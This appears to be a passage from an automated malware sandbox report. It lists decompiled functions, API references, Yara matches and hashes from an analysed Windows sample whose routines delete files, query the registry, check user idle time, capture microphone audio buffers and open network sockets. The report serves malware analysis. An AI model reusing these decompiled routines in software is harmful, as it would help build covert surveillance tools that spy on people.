                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000005,?,?,?,?,?,00000000), ref: 0040E4B2
                                  • atoi.MSVCRT ref: 0040E4B9
                                  • ShowWindow.USER32(00000000,?,?,?,?,00000000), ref: 0040E4C1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@ShowWindowatoi
                                  • String ID:
                                  • API String ID: 4290155986-0
                                  • Opcode ID: e3ee81d1164a93c1fb4c98a060b1854a377feaec9e71c2190706ee9b8168fb8d
                                  • Instruction ID: f5d1e7a26b168e10bd759941827291fab992d242b1d9cf9e3ab824cccb0e0fd7
                                  • Opcode Fuzzy Hash: e3ee81d1164a93c1fb4c98a060b1854a377feaec9e71c2190706ee9b8168fb8d
                                  • Instruction Fuzzy Hash: 66E0ED31910518CBDB04EBE1EC5DAEDB734FB94316F10483AE113A60E1DB785556CA18
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406CFF, Relevance: 7.5, APIs: 5, Instructions: 25fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 25%
                                  			E00406CFF(WCHAR* __eax, void* __ecx) {
				WCHAR* _t5;
				signed int _t8;
				signed int _t9;
				void* _t15;

				_t15 = __ecx;
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t5 = DeleteFileW(__eax);
				_t9 = _t8 & 0xffffff00 | _t5 != 0x00000000;
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(_t15 + 0x64, 0x415800);
				if(_t5 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					RemoveDirectoryW(_t5);
				}
				return _t9;
			}







                                  0x00406d01
                                  0x00406d06
                                  0x00406d0d
                                  0x00406d15
                                  0x00406d21
                                  0x00406d2b
                                  0x00406d2f
                                  0x00406d36
                                  0x00406d36
                                  0x00406d40

                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0041B900,00000000,00406D78), ref: 00406D06
                                  • DeleteFileW.KERNEL32(00000000), ref: 00406D0D
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041B89C,00415800), ref: 00406D21
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00406D2F
                                  • RemoveDirectoryW.KERNEL32(00000000), ref: 00406D36
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: G@std@@U?$char_traits@V?$allocator@$?c_str@?$basic_string@G@2@@std@@$??9std@@DeleteDirectoryFileG@2@@0@RemoveV?$basic_string@
                                  • String ID:
                                  • API String ID: 1823182134-0
                                  • Opcode ID: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                  • Instruction ID: 37aca360b5e6e25e1cbc72d235888c1a7b4a7ee3696255f0ca1c3cc056b1b9b3
                                  • Opcode Fuzzy Hash: e1205a74ebe12c2f7724168040a5bb9e42afa766117467129f77aed8f79a1ea5
                                  • Instruction Fuzzy Hash: EFE04F76541E25EBCA051BA0EC0C5CE3768AE85262394803AF802A3150CB6888458B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004050C0, Relevance: 7.5, APIs: 5, Instructions: 16COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050D0
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050D9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004050E2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050EB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004050F4
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ??1?$basic_string@U?$char_traits@V?$allocator@$D@2@@std@@D@std@@$G@2@@std@@G@std@@
                                  • String ID:
                                  • API String ID: 1976170855-0
                                  • Opcode ID: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                  • Instruction ID: df7224a0d3b933aacf5f44a1e86bfce5252a8e6dee322f0028cbab2c50653025
                                  • Opcode Fuzzy Hash: fcaf67b23cf8da97c98a3eac03dae005745d9efb892964cdfd85d02046970d3a
                                  • Instruction Fuzzy Hash: D4E0B630010E0ECBC7289B10E9598EABBB0FF90B46300843EA463434B0DFB0694ACB89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402750, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(KeepAlive Disabled!,?,0041BE70,0041BE70), ref: 00402771
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([WARNING],?), ref: 00402785
                                    • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                    • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                    • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                    • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@D@1@@V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                  • String ID: KeepAlive Disabled!$[WARNING]
                                  • API String ID: 2944585167-3856563802
                                  • Opcode ID: 98d74f14f2a3a9b479e6948a5678522134b56ef532e3f160f0c8c38e83814790
                                  • Instruction ID: a30e930004435671851b5eafd83b9c9ec9f6d71b75df5e3fdd77de3efe23ec90
                                  • Opcode Fuzzy Hash: 98d74f14f2a3a9b479e6948a5678522134b56ef532e3f160f0c8c38e83814790
                                  • Instruction Fuzzy Hash: F3F027705103187FEB10B729C94EBEE7F8C8742354F40006AEC11532C1E6F9A9C486EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401895, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018A7
                                  • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(0041BCB0,?,?,?,?,?,00401826,004140D8,0041BCB0,?,00408D8A,00000003,00000000), ref: 004018B4
                                  • _CxxThrowException.MSVCRT(?,00416F28), ref: 004018C3
                                    • Part of subcall function 0040190F: ??2@YAPAXI@Z.MSVCRT ref: 0040191F
                                  Strings
                                  • invalid vector<T> subscript, xrefs: 004018A2
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@??2@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                  • String ID: invalid vector<T> subscript
                                  • API String ID: 1986322901-3016609489
                                  • Opcode ID: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                  • Instruction ID: dbd3af195aa641a4d32eff83d77deebdd7394ec7269c4e3ee2ba11d1d7788022
                                  • Opcode Fuzzy Hash: 2e9354e5990b536fab42c5ed924f0a28d80902484f77cec2bc6a0e7e6b145e84
                                  • Instruction Fuzzy Hash: 0FE0E57145430EBBDF04FBE1DD46DEDB77CAB14745F100016F50062091FA75A6598769
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040500C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(invalid vector<T> subscript,?,00000000,0041B8D8,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040501E
                                  • ??0out_of_range@std@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@1@@Z.MSVCP60(?,?,00404EDA,00000000,00000004,0041B310,?,?,?,0040E3FF,00000000), ref: 0040502B
                                  • _CxxThrowException.MSVCRT(?,00416F28), ref: 0040503A
                                  Strings
                                  • invalid vector<T> subscript, xrefs: 00405019
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$??0?$basic_string@??0out_of_range@std@@D@1@@D@2@@1@@D@2@@std@@ExceptionThrowV?$basic_string@
                                  • String ID: invalid vector<T> subscript
                                  • API String ID: 3609083747-3016609489
                                  • Opcode ID: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                  • Instruction ID: 9be96ab786121cdca3df7d0b72c820f15abd94e2066078dc6746ba185848b686
                                  • Opcode Fuzzy Hash: f2318338d56b632758377919ba935548815a1a15df351b5bf930e86c92a347c4
                                  • Instruction Fuzzy Hash: ADD0127181030FFBCF00FBE0DD49CEDB77CAA04709B100015B511A3054FA74A64E8B69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412019, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00412019() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
				 *0x41c1dc = _t2;
				return _t2;
			}




                                  0x0041202f
                                  0x00412035
                                  0x0041203a

                                  APIs
                                  • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00412028
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041202F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetLastInputInfo$User32.dll
                                  • API String ID: 2574300362-1519888992
                                  • Opcode ID: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                  • Instruction ID: 4254d4a464572d01fe3095e43ecaf4df99145fa2531fe7b32d94017085124a09
                                  • Opcode Fuzzy Hash: 309a20106e4e73e8368ae1d4b5b3144523e47d6202d84086a94c943d5948cba1
                                  • Instruction Fuzzy Hash: F2C09B709D0650FB86011FA0AD1DBD83B15664B745721C933B902F5251CBB8D080EF1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F4AE, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040F4AE() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
				 *0x41bf1c = _t2;
				return _t2;
			}




                                  0x0040f4c4
                                  0x0040f4ca
                                  0x0040f4cf

                                  APIs
                                  • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040F4BD
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040F4C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: GetCursorInfo$User32.dll
                                  • API String ID: 1646373207-2714051624
                                  • Opcode ID: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                  • Instruction ID: c5b485f27e89021cea1a89f12a6954dfd40793fe5a01e249b662889bc5cfc0be
                                  • Opcode Fuzzy Hash: 4448927a859271910f0b75d11c3b5b646031b719c8466c7563d1e3f86e814f60
                                  • Instruction Fuzzy Hash: F0C04C75551600A686005FA1BC0D6D53A14A956745711C436B802B1255CB7C41459E5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413AED, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00413AED() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
				 *0x41c1f8 = _t2;
				return _t2;
			}




                                  0x00413b03
                                  0x00413b09
                                  0x00413b0e

                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 00413AFC
                                  • GetProcAddress.KERNEL32(00000000), ref: 00413B03
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: GetConsoleWindow$kernel32.dll
                                  • API String ID: 2574300362-100875112
                                  • Opcode ID: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                  • Instruction ID: 6ee53b0f0035eccf7fe7e145557d43f0b39688fed8dbf49153f7f93891f0b47b
                                  • Opcode Fuzzy Hash: 9955e51fb7636a0590f3210687e67071c6be7c6c5ddc6a030eb57b0b1f68f6e2
                                  • Instruction Fuzzy Hash: 83C09BB4AD1611FB86015FA0BC4EAC87B145A46707332C077781191255DA7880C45A1D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412D56, Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00412D56(void* __ecx, void* _a4, long _a8, long _a12, intOrPtr _a16) {
				long _v8;
				long _v12;
				intOrPtr _t14;
				struct _OVERLAPPED* _t19;
				long _t22;
				struct _OVERLAPPED* _t24;
				void* _t28;

				_t24 = 0;
				_t14 = _a16;
				if(_t14 == 0) {
					_v12 = 0x40000000;
					_v8 = 2;
				} else {
					if(_t14 == 1) {
						_t22 = 4;
						_v12 = _t22;
						_v8 = _t22;
					}
				}
				_t28 = CreateFileW(_a12, _v12, _t24, _t24, _v8, 0x80, _t24);
				if(_t28 != 0xffffffff) {
					if(_a16 != 1 || SetFilePointer(_t28, _t24, _t24, 2) != 0xffffffff) {
						if(WriteFile(_t28, _a4, _a8,  &_a12, _t24) != 0) {
							_t24 = 1;
						}
					}
					CloseHandle(_t28);
					_t19 = _t24;
				} else {
					_t19 = 0;
				}
				return _t19;
			}










                                  0x00412d5f
                                  0x00412d62
                                  0x00412d64
                                  0x00412d74
                                  0x00412d7b
                                  0x00412d66
                                  0x00412d67
                                  0x00412d6b
                                  0x00412d6c
                                  0x00412d6f
                                  0x00412d6f
                                  0x00412d67
                                  0x00412d99
                                  0x00412d9e
                                  0x00412da8
                                  0x00412dce
                                  0x00412dd0
                                  0x00412dd0
                                  0x00412dce
                                  0x00412dd3
                                  0x00412dd9
                                  0x00412da0
                                  0x00412da0
                                  0x00412da0
                                  0x00412dde

                                  APIs
                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00412DAF
                                  • WriteFile.KERNEL32(00000000,40000000,?,?,00000000), ref: 00412DC6
                                  • CloseHandle.KERNEL32(00000000), ref: 00412DD3
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandlePointerWrite
                                  • String ID:
                                  • API String ID: 3604237281-0
                                  • Opcode ID: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                  • Instruction ID: ca773920b5f39e1e62b037f934487c6bab51a0d9f38e2d78726aa57b3ce32958
                                  • Opcode Fuzzy Hash: b6fc8936da6e294b4790fd661f23c461e372249c0823290801eb98338cb1c386
                                  • Instruction Fuzzy Hash: 26118E71500508BFDF118F94ED88FEF7B6CEB05368F108222F911D6190D2B54EA09768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B615, Relevance: 6.1, APIs: 4, Instructions: 57registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E0040B615(void* __ecx, intOrPtr _a4, void* _a8, short* _a12, char _a15) {
				int _v8;
				int _v12;
				char* _t31;
				signed int _t36;
				signed int _t37;
				void* _t46;

				_v8 = 0;
				_t31 = 0x415664;
				if(RegQueryValueExW(_a8, _a12, 0,  &_v12, 0,  &_v8) == 0 && _v8 > 0) {
					_t31 = malloc(_v8);
					_t36 = _v8;
					_t46 = _t31;
					_t37 = _t36 >> 2;
					memset(_t46 + _t37, memset(_t46, 0, _t37 << 2), (_t36 & 0x00000003) << 0);
					RegQueryValueExW(_a8, _a12, 0,  &_v12, _t31,  &_v8);
				}
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t31,  &_a15);
				return _a4;
			}









                                  0x0040b62f
                                  0x0040b635
                                  0x0040b641
                                  0x0040b652
                                  0x0040b654
                                  0x0040b65b
                                  0x0040b65d
                                  0x0040b667
                                  0x0040b67a
                                  0x0040b67a
                                  0x0040b684
                                  0x0040b691

                                  APIs
                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B63D
                                  • malloc.MSVCRT ref: 0040B64B
                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0040B67A
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415664,?), ref: 0040B684
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: QueryV?$allocator@Value$??0?$basic_string@G@1@@G@2@@std@@G@std@@U?$char_traits@malloc
                                  • String ID:
                                  • API String ID: 3506253819-0
                                  • Opcode ID: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                  • Instruction ID: 6657ce7e0b4af722a3644f787a918a8cc9d20f3304ca96b666d2b0068cb46159
                                  • Opcode Fuzzy Hash: 334642ca9c5921904f617564a68cf70a4dc2ee16bb16387c8e9b5fee4fcdd566
                                  • Instruction Fuzzy Hash: 3E11097260010DFFDB05DF95DD80DEFBBBDEB88250B10406ABA05D6250D7719E149BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004028CD, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004028DC
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402915
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402928
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040295E,00000001,00000073), ref: 00402953
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@$??1?$basic_string@??4?$basic_string@V01@connectsocket
                                  • String ID:
                                  • API String ID: 182292213-0
                                  • Opcode ID: c8132844b4a173a6c1e4eca6246d48779cae89e30dd47f92cbf8853fb9f1e03b
                                  • Instruction ID: 3575325012e9a6a69ab12c81105f5cb7c7dcd4fb264b21d23710b3ab9203063c
                                  • Opcode Fuzzy Hash: c8132844b4a173a6c1e4eca6246d48779cae89e30dd47f92cbf8853fb9f1e03b
                                  • Instruction Fuzzy Hash: 0301B97170030867DB00BB76DE4D6EE3A5DDBC5350F40803ABE169B2D1CBB9894483D9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401181, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00401181(void* __eflags, signed int _a4) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t22;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				signed int _t36;

				_t38 = __eflags;
				E0040180C(0x41b200, __eflags, _a4);
				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d4);
				_t36 = _a4 << 5;
				_t16 = E0040180C(0x41b200, _t38, _a4);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t28 =  *0x41b1dc; // 0x1242ca8
				 *((intOrPtr*)(_t36 + _t28)) = _t16;
				_t17 =  *0x41b1dc; // 0x1242ca8
				_t29 =  *0x41b1d4; // 0x0
				 *((intOrPtr*)(_t36 + _t17 + 4)) = _t29;
				_t30 =  *0x41b1dc; // 0x1242ca8
				 *((intOrPtr*)(_t36 + _t30 + 8)) = 0;
				_t31 =  *0x41b1dc; // 0x1242ca8
				 *((intOrPtr*)(_t36 + _t31 + 0xc)) = 0;
				_t32 =  *0x41b1dc; // 0x1242ca8
				 *((intOrPtr*)(_t36 + _t32 + 0x10)) = 0;
				_t33 =  *0x41b1dc; // 0x1242ca8
				 *((intOrPtr*)(_t36 + _t33 + 0x14)) = 0;
				_t19 =  *0x41b1dc; // 0x1242ca8
				waveInPrepareHeader( *0x41b198, _t19 + _t36, 0x20);
				_t22 =  *0x41b1dc; // 0x1242ca8
				return waveInAddBuffer( *0x41b198, _t36 + _t22, 0x20);
			}














                                  0x00401181
                                  0x00401196
                                  0x0040119d
                                  0x004011ab
                                  0x004011ae
                                  0x004011b5
                                  0x004011bb
                                  0x004011c3
                                  0x004011c6
                                  0x004011cb
                                  0x004011d1
                                  0x004011d5
                                  0x004011dd
                                  0x004011e1
                                  0x004011e7
                                  0x004011eb
                                  0x004011f1
                                  0x004011f5
                                  0x004011fb
                                  0x004011ff
                                  0x0040120d
                                  0x00401213
                                  0x0040122c

                                  APIs
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(?,00000000,?,?,0040116A,00000000), ref: 0040119D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,0040116A,00000000), ref: 004011B5
                                  • waveInPrepareHeader.WINMM(01242CA8,00000020,?,?,0040116A,00000000), ref: 0040120D
                                  • waveInAddBuffer.WINMM(?,00000020,?,?,0040116A,00000000), ref: 00401223
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@?resize@?$basic_string@BufferHeaderPrepare
                                  • String ID:
                                  • API String ID: 1952094867-0
                                  • Opcode ID: cba3c179512d5eb9509709d99886367f0e09bfaf78f205ade4979b92c6ff8bdb
                                  • Instruction ID: 8f998c45a3acb3b0b10d37a494ac82bd1c86fe74dd73c150e7a1b96005ae6754
                                  • Opcode Fuzzy Hash: cba3c179512d5eb9509709d99886367f0e09bfaf78f205ade4979b92c6ff8bdb
                                  • Instruction Fuzzy Hash: 83111835600644FFCB159F65EC689E67BE6EB89394702C83DED0A87365DB31A801CBD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B522, Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                  • RegQueryValueExA.ADVAPI32(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                  • RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@OpenQueryU?$char_traits@Value
                                  • String ID:
                                  • API String ID: 2462357041-0
                                  • Opcode ID: 57c7c103ff9b08e3e02a73ce7dec204de8a86c9bec5313fbbfa2b155cf811d2d
                                  • Instruction ID: f17c32bc227b8fe577d0db1d358ecf0b28a093220f684ee6c8601fb0e55a49ce
